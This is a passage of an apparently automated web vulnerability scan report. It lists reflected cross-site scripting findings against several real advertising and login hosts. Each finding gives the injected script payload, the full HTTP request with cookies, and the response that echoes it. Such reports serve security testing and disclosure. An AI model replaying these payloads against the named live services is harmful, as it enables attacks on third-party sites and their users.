2fd3b1a46a79&ll=0&hbll=0&id=FCBEC610ABA64BC3BAF092D3EB42D7C0&idh=e18a41658ec9c9c740dc1b91edbc4646&pvu=59196390591647FA9372FACB8C10DBA5&pvm=35e167e1c66fee62be98fe397190a726&uf=0&ur=0&llip=0&ttv=1&redir=f0f14</script><script>alert(1)</script>21c15be81c4";ebO.fru="http://spamlaws.us.intellitxt.com/al.asp?ts=20110426142113&at=39&ipid=10143&di=31742909&syid=0&adid=0&pid=2&cc=us&rcc=us&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&ll=0&hbll=0&id=FCBEC610ABA64BC3BA
...[SNIP]...

4.17. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.comodo.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cfd8a<script>alert(1)</script>72f799469a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.comodo.com/p.json?callback=_ate.ad.hprcfd8a<script>alert(1)</script>72f799469a8&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fbusiness-security%2Fpci-compliance%2Fpci-scan.php&scb19p HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303662902.60|1303662902.1OD|1303662902.1FE; dt=X; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 388
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 25 Apr 2011 23:45:35 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25 May 2011 23:45:35 GMT; Path=/
Set-Cookie: di=%7B%7D..1303775135.1FE|1303775135.60; Domain=.addthis.com; Expires=Wed, 24-Apr-2013 15:09:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 25 Apr 2011 23:45:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 23:45:35 GMT
Connection: close

_ate.ad.hprcfd8a<script>alert(1)</script>72f799469a8({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.comodo.
...[SNIP]...

4.18. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 89d32<script>alert(1)</script>427b70698ad was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-5253809430940410%26output%3Dhtml%26h%3D600%26slotname%3D1644788465%26w%3D120%26lmt%3D1303845665%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.spamlaws.com%252Fspam-blocker.html%26dt%3D1303827665898%26bpp%3D8%26shv%3Dr20110420%26jsv%3Dr20110415%26prev_slotnames%3D8319948044%252C1020003104%252C9565114904%252C0023118579%26correlator%3D1303827663964%26frm%3D0%26adk%3D222637912%26ga_vid%3D902403751.1303827664%26ga_sid%3D1303827664%26ga_hid%3D1845423620%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D965%26bih%3D956%26fu%3D0%26ifi%3D5%26dtd%3D13%26xpc%3DgvNjmv27ZD%26p%3Dhttp%253A%2F%2Fwww.spamlaws.com&uid=ZC45X9Axu6NOUFfX_28966789d32<script>alert(1)</script>427b70698ad&xy=0%2C0&wh=120%2C600&vchannel=69114&cid=166308&iad=1303827681130-85943930735811580&cookieenabled=1&screenwh=1920%2C1200&adwh=120%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=553DB0EC1C4D0E488AA95BECE444E49E; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Tue, 26 Apr 2011 14:21:21 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_28966789d32<script>alert(1)</script>427b70698ad");

4.19. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd50a'-alert(1)-'5ee4841495 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=pHA9CtcjE0CkcD0K1yMTQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAcx9FGwAAAAA.&tt_code=vert-314&udj=uf%28%27a%27%2C+9797%2C+1303827657%29%3Buf%28%27c%27%2C+52368%2C+1303827657%29%3Buf%28%27r%27%2C+173252%2C+1303827657%29%3Bppv%288991%2C+%276718109068834708565%27%2C+1303827657%2C+1303870857%2C+52368%2C+25553%29%3B&cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..dd50a'-alert(1)-'5ee4841495&referrer=http://www.spamlaws.com/spam-blocker.html&pp=TbbUyQAERXEK7FrIESl1USKqAlzx_1NgCAINaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i; path=/; expires=Mon, 25-Jul-2011 14:21:39 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 26 Apr 2011 14:21:39 GMT
Content-Length: 1587

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bb9cfe77\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLa
...[SNIP]...
EQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..dd50a'-alert(1)-'5ee4841495/referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGD
...[SNIP]...

4.20. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 117b1'%3balert(1)//a202ffbf5ef was submitted in the redir parameter. This input was echoed as 117b1';alert(1)//a202ffbf5ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ptj?member=541&size=728x90&inv_code=1712152&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1712152117b1'%3balert(1)//a202ffbf5ef HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII3I4BEAoYASABKAEwu5nb7QQQu5nb7QQYAA..; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb878257=-@L6DkI/7Z(hw'8[[6$!u[Y)C?enc=amlp6fDwAEAAAADAzMz8PwAAAMDMzPw_Es64uq1-E0DZW8r5Yu8WQDnocxW7-iJ5SsYda6b2ziW7zLZNAAAAAMVYAwAdAgAAlgIAAAIAAADIpAIAk8AAAAEAAABVU0QAVVNEANgCWgBWHwAATg8BAgUCAAUAAAAADCdr_gAAAAA.&tt_code=1712152&udj=uf%28%27a%27%2C+9797%2C+1303825615%29%3Buf%28%27c%27%2C+52368%2C+1303825615%29%3Buf%28%27r%27%2C+173256%2C+1303825615%29%3Bppv%288991%2C+%278728814709223188537%27%2C+1303825615%2C+1303868815%2C+52368%2C+49299%29%3B&cnd=!cBNCYQiQmQMQyMkKGAAgk4EDKAAxUUxr4mLvFkBCDggAELWn6QEYoQEgASgFQgwIn0YQuCEYAiADKAFCCwifRhAAGAAgAigBSANQAFjWPmAAaJYF; path=/; expires=Wed, 27-Apr-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; path=/; expires=Mon, 25-Jul-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:35 GMT
Content-Length: 195

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=541&anprice=170&ad_type=ad&ad_size=728x90&section=1712152117b1';alert(1)//a202ffbf5ef"></scr'+'ipt>');

4.21. http://login.sisna.com/login_multiple/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d08e3"><script>alert(1)</script>82ebadbbe5e was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_multiple/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3Ed08e3"><script>alert(1)</script>82ebadbbe5e HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:57:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2071
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form action="/login_multiple/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3Ed08e3"><script>alert(1)</script>82ebadbbe5e" method="post" name="login">
...[SNIP]...

4.22. http://login.sisna.com/login_multiple/ [RelayState parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The value of the RelayState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e0ea"><script>alert(1)</script>b83bede8fd2 was submitted in the RelayState parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D28e0ea"><script>alert(1)</script>b83bede8fd2 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2785
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D28e0ea"><script>alert(1)</script>b83bede8fd2" method="post" name="login">
...[SNIP]...

4.23. http://login.sisna.com/login_multiple/ [SAMLRequest parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The value of the SAMLRequest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ad7"><script>alert(1)</script>2c2eb30ca40 was submitted in the SAMLRequest parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D59ad7"><script>alert(1)</script>2c2eb30ca40&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:45:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2785
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
dKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D59ad7"><script>alert(1)</script>2c2eb30ca40&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dl
